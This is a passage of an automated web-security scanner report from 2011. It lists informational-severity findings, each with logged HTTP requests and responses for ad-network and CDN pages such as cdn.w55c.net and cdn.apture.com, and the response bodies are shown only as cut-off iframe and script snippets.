Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001hH4jaFhv09wy00001hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGu0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFSZ09nl00001hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; expires=Sat, 23-Jul-2011 12:13:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000001uj99y10000000001ui7.Ws0000000001ui; expires=Sat, 23-Jul-2011 12:13:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 24 Apr 2011 16:12:59 GMT
Connection: close
Content-Length: 2131

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

32.28. http://cdn.apture.com/media/html/aptureLoadIframe.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.apture.com
Path:   /media/html/aptureLoadIframe.html

Request

GET /media/html/aptureLoadIframe.html?v=29213360 HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:40:09 GMT
Server: PWS/1.7.1.5
X-Px: ht iad-agg-n25.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Thu, 28 Apr 2011 00:05:55 GMT
Age: 351254
Content-Type: text/html
Vary: Accept-Encoding
Px-Uncompress-Origin: 1760
Last-Modified: Wed, 20 Apr 2011 23:52:34 GMT
Connection: keep-alive
Content-Length: 1760

<!--
This is the page which handles fetch/load of localStorage
-->


<!DOCTYPE html>
<html>
<body>
<script>apture=window.apture=window.apture||{};aptureCache=apture.fileCache={};aptureCache.lo
...[SNIP]...

32.29. http://cdn.w55c.net/i/0R99JaasWk_1847829791.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R99JaasWk_1847829791.html

Request

GET /i/0R99JaasWk_1847829791.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAE_LoK5XuIHB0satALga2stUWRTt_29A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFI5OUphYXNXaw&reqid=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502295&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502306&frm=1&adk=2614322350&ga_vid=880493158.1303658502&ga_sid=1303658502&ga_hid=2002983713&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:28:58 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:02:25 GMT
Date: Sun, 24 Apr 2011 15:27:54 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6967

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.13;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUj
...[SNIP]...

32.30. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R9ulNflD0_1008589149.html

Request

GET /i/0R9ulNflD0_1008589149.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAfQAL6XgK5XGOKLxYbPmt5BBxSOnJCdA1hw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZhWXZLM3ZQaA&ciu=MFI5dWxOZmxEMA&reqid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=182&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676624&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658624768&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303658624770&frm=1&adk=2614322350&ga_vid=2012220246.1303658625&ga_sid=1303658625&ga_hid=284855663&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895130&fu=4&ifi=1&dtd=5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:19 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 31 Mar 2011 15:08:20 GMT
Date: Sun, 24 Apr 2011 14:53:07 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1451

<iframe src="http://view.atdmt.com/DEI/iview/310322587/direct/01/NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk
...[SNIP]...

32.31. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RDMd2Pp56_1855871382.html

Request

GET /i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzNjM0fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgxNTk5&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRALQAI-hAK5XtJGKsHuhilbCHDocZSZdL3wA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=381&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676544&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658544577&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658544581&frm=1&adk=2614322350&ga_vid=1063735003.1303658545&ga_sid=1303658545&ga_hid=467631587&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895132&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:22:23 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:12:52 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 07 Mar 2011 14:26:38 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 836

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4270.158901.DATAXU/B5279322.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzN
...[SNIP]...

32.32. http://cdn.w55c.net/i/0RES95J3Zo_918427505.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RES95J3Zo_918427505.html

Request

GET /i/0RES95J3Zo_918427505.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAHP6EK5X5HHeFjM058SIacGTDQNRf0Tg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZNQXp6YTk2dA&ciu=MFJFUzk1SjNabw&reqid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=866&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516462&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516467&frm=1&adk=2614322350&ga_vid=1758961832.1303658516&ga_sid=1303658516&ga_hid=2008436335&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:29:39 GMT
Cache-Control: no-cache, no-store
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 28 Feb 2011 21:20:22 GMT
Date: Sun, 24 Apr 2011 14:52:24 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1248

<IFRAME SRC="http://ad.doubleclick.net/adi/N4270.158901.DATAXU/B5279302.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUk
...[SNIP]...

32.33. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0REyoPRMSz_696710848.html

Request

GET /i/0REyoPRMSz_696710848.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAAwAFoYUK5XeVIQpujIjD7cILBOkoQIpRdg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=331&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676502&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658502354&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658502359&frm=1&adk=513358139&ga_vid=2102368488.1303658502&ga_sid=1303658502&ga_hid=1386538034&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:21:40 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:19:55 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:04:45 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6961

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV
...[SNIP]...

32.34. http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RFFcWpaTN_954073853.html

Request

GET /i/0RFFcWpaTN_954073853.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAIEK0K5YNMOLob9Z6R4rJH8FZ3KUYu1A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZGeVp3NFpBSg&ciu=MFJGRmNXcGFUTg&reqid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=503&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516518&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516523&frm=1&adk=513358139&ga_vid=1030430259.1303658517&ga_sid=1303658517&ga_hid=340899808&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:29:54 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 15 Mar 2011 22:27:10 GMT
Date: Sun, 24 Apr 2011 15:22:04 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1172

<IFRAME SRC="http://ad.doubleclick.net/adi/N5315.158901.DATAXU/B5334493.10;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEV
...[SNIP]...

32.35. http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RHDjk2rJk_401783982.html

Request

GET /i/0RHDjk2rJk_401783982.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkZ8R0ZkTjZCUkZycHwxMzAzNjU4NjU0MDYyfDF8MEY5SUVVUHozanwwUkhEamsyckprfEVYXzEwMjM0NzcyMDZ8MjY2NzYw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAnAAAhwgK5WeiMK0_v1fWmDwcBhlvtoikzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5SUVVUHozag&ciu=MFJIRGprMnJKaw&reqid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=266&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676654&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658654961&bpp=7&shv=r20110420&jsv=r20110415&correlator=1303658654970&frm=1&adk=513358139&ga_vid=37961730.1303658655&ga_sid=1303658655&ga_hid=329915175&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=36813006%2C33895132&fu=4&ifi=1&dtd=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:19 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:08:39 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 29 Mar 2011 15:55:16 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
